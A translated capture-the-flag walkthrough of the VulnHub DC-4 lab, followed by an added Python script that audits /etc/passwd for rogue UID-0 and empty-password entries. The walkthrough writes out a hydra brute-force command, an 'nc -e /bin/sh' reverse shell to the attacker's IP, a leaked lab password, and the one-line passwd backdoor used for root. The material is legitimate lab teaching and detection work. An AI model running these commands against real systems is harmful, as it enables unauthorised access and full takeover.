VulnHub DC series target machine: DC:4
2021-01-13 12:12:38 Author: www.freebuf.com (view original) Reads: 210

0x0: Lab overview

Lab name: DC:4

Release date: 2019-4-7

Lab URL: https://www.vulnhub.com/entry/dc-4,313/

Lab description:

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

1x0: Environment setup

VMware virtual machine (bridged mode)

2x0: Compromising the target

Find the target's IP

nmap -sn 192.168.3.0/24

Use nmap to check the target's open ports, services and OS information

Start by looking at the web service on port 80

Nothing obvious here, just a login page; scan for directories with dirb

The scan turned up no useful pages, and trying for readme-type files found nothing either

Tried the login form: SQL injection (sqlmap found nothing) and all the usual authentication-bypass passwords, with no result (so, reluctantly, brute force)

Wordlist used: /usr/share/wordlists/metasploit/password.lst (it took far too long)

Burp was too slow, so I switched tools

hydra -l admin -P /usr/share/wordlists/metasploit/password.lst -t 4 192.168.3.32 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

Finally into the admin panel (brute forcing is really painful)

3x0: The admin panel

Command execution? Capture the request and take a look

Capture the request and run a command

Also check what privileges we have

Get a reverse shell: the attacking machine listens on port 44123

nc -lvvp 44123

On the target, run: nc -e /bin/sh 192.168.3.20 44123

4x0: Privilege escalation

Use python to upgrade to an interactive shell

Python is available on this machine; why wasn't it on DC-3...

There is an archive in www; extract it

It turns out to be a backup of the DC website

Kernel version (nothing exploitable here)

Tried a few exploits; none of them would compile

No usable commands with root privileges either

Found something that looks like a wordlist in jim's directory

SSH brute force against jim, sam and charles separately (the other two didn't crack)

Log in over SSH with the jim account

Contents of mbox (the mail)

Check whether the system has any mail-related files

There is a mail for jim containing charles's password (^xHhA&hvim0y)

Switch to the charles account (and check which commands can be run with root privileges)

Use the teehee command to add an account with root privileges

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

su admin then gives root privileges

Privilege escalation succeeded:

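The line appended to /etc/passwd above is exactly what a defender should be alerting on: a second UID-0 account with an empty password field. The following added example (not part of the original post) audits passwd-format content for that pattern and a few related ones; the sample entries are constructed, not copied from the DC-4 image.

```python
import sys

# Constructed sample in /etc/passwd format (names/UIDs are assumptions, not from DC-4);
# the last line is the kind of entry "sudo teehee -a /etc/passwd" lets a user append.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:,,,:/home/jim:/bin/bash
charles:x:1002:1002:,,,:/home/charles:/bin/bash
admin::0:0:::/bin/bash
"""

def parse_passwd(text):
    """Split passwd-format text into dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # name:pw:uid:gid:gecos:home:shell
            entries.append({"line": lineno, "malformed": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "home": home, "shell": shell})
    return entries

def audit_passwd(text):
    """Return (line, account, reason) findings for suspicious passwd entries."""
    findings = []
    seen = set()
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["line"], e["malformed"], "malformed entry"))
            continue
        if e["name"] in seen:
            findings.append((e["line"], e["name"], "duplicate account name"))
        seen.add(e["name"])
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], e["name"], "non-root account with UID 0"))
        if e["pw"] == "":
            findings.append((e["line"], e["name"], "empty password field"))
        elif e["pw"] not in ("x", "*", "!", "!!"):
            findings.append((e["line"], e["name"], "credential stored in passwd, not shadow"))
    return findings

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path, encoding="utf-8") as fh:
        for line, account, reason in audit_passwd(fh.read()):
            print(f"line {line}: {account}: {reason}")
```

Run it against a live /etc/passwd (or a copy) to get one line per finding; a sudoers rule that lets a user append to that file should be treated as equivalent to granting root.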
5x0: Getting the flag

This lab involves far too much brute forcing... it takes way too long


Source: https://www.freebuf.com/articles/web/260667.html